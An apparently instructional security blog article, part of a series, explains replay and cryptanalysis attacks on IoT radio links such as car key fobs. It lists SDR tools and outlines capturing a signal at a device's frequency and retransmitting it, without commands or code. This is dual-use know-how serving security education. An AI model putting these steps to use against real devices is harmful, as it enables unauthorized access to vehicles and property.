This is the 4th part of the “IoT – Radio Communication Attack” series. It is important to review the other three articles to have a good understanding of the material covered in this article.

What we will learn – This article covers the various attacks that are possible on the Radio Communications component of an IoT Device. The attack methodology will be further examined, as well as the tools that are used and how the attack can be performed using them. Also, the theory behind the various attacks on Radio Communication will be reviewed.

Radio CommunicationLet us understand what Radio Communication is first, so it becomes easy to understand how the various attacks can occur. Have a look at the image shown below.


The above image is of a car and a key fob for locking and unlocking the vehicle. One presses a button, and the car is locked/unlocked based on the key pressed.

When one presses the key, some data is transmitted in a binary format. The data is obtained after reversing the radio communication, which we will be examined in a future article. This binary data contains the logic of locking/unlocking the car. Thus, based on the binary data that is transferred, the car then is locked or unlocked.

The following are attacks that can be performed on the Radio Communication component of any IoT Device:

  1. Replay Attack – This is the most prevalent threat. Also, it is straightforward to perform because of its substantial level of usage by the cyber attacker. As the name implies, the original data is replayed to the IoT device for performing the actual attack.

    Tools Used – HackRF, BladeRF, RTL-SDR, FUNcube dongle, GQRX, SDR#, URH, etc.

    The steps for performing the attack –

    1. Capture the original data transmitted to the IoT device – For capturing the transmitted data, we can make use of hardware devices (henceforth referred to as “tools” in the rest of this article) such as HackRF, RTL-SDR, FUNcube dongle, BladeRF, etc.
    2. Finding the transmission Frequency – Whenever any IoT device is transmitting/receiving the data, it sends and receives it over a particular frequency. Thus, identifying the frequency channel is of utmost importance. The frequency for an IoT device can be easily found by searching the FCC ID number of the device. If it is not listed on the device, you then must search for it manually. The majority of the devices communicate on the 313-318 MHz or 433 MHz channel.
    3. Tuning the Hardware Device – Once you have determined the actual frequency, the Hardware Device should be tuned into it to capture the transmitted/received data.
    4. Saving the data for transmission – After tuning the device, the transmitted data should then be captured and saved to the local to your computer. After saving it, the captured data should then be transmitted for launching the replay attack.

Among all the tools described in this article, the HackRF is the most widely used. Thus, the scope of the article will be restricted to the HackRF tool.

The Replay Attack that is launched by the HackRF is illustrated in the screenshot below:

Ethical Hacking Training – Resources (InfoSec)


In the image above, the transmitted data is captured into the raw file named connector.raw, and the data is captured at the frequency of 433.9 Mhz.


As illustrated above, the captured raw file (connector.raw) is transmitted using the HackRF tool on the frequency channel of 433.9 Mhz. This is used to launch the actual Replay Attack.

This is how the Replay Attack is launched using the HackRF tool:

  1. Cryptanalysis Attack – This method involves reversing the communication flow of the IoT device. For example, the original data which is transmitted to the IoT device is analyzed and then reversed for obtaining the binary form. This attack is difficult to perform since it needs the exact data in the binary form, as well as the Modulation Technique used and the Baud Rate of the transmission that is being transmitted. If the data and the baud rate are not an exact match, the attack then cannot be launched.

    Tools Used – HackRF, CC1111, RTL-SDR, SDR#, GNURadio, rfcat, Audacity, etc.

    Steps for performing the attack –

    1. Capture the original data that is transmitted to the IoT device – The procedure is the same as for launching the Replay Attack.
    2. Analyzing and Processing the data – In this step, the data obtained is analyzed and processed for finding the modulation scheme. The analyzed data is then used for demodulation purposes, removing any extraneous noise, increasing the signal strength, identifying the baud rate, etc.
    3. Reverse Engineering – Once the data is analyzed and processed, the binary data is then obtained. Once we have the baud rate and the Modulation
      scheme that is being used, the data is then sent back to the IoT device for launching the actual attack. This kind of attack is complicated to perform when compared to the replay attack.

These are the two types attacks that are widely executed out on the Radio Communication component of an IoT device. The theory of these attacks has been covered in this article. The next one will be providing actual examples of these kinds of attacks.

References –

https://www.scienceabc.com/innovation/how-does-car-starter-remote-keyless-entry-start-work.html

http://sh3llc0d3r.com/iot-replay-attack-with-hackrf/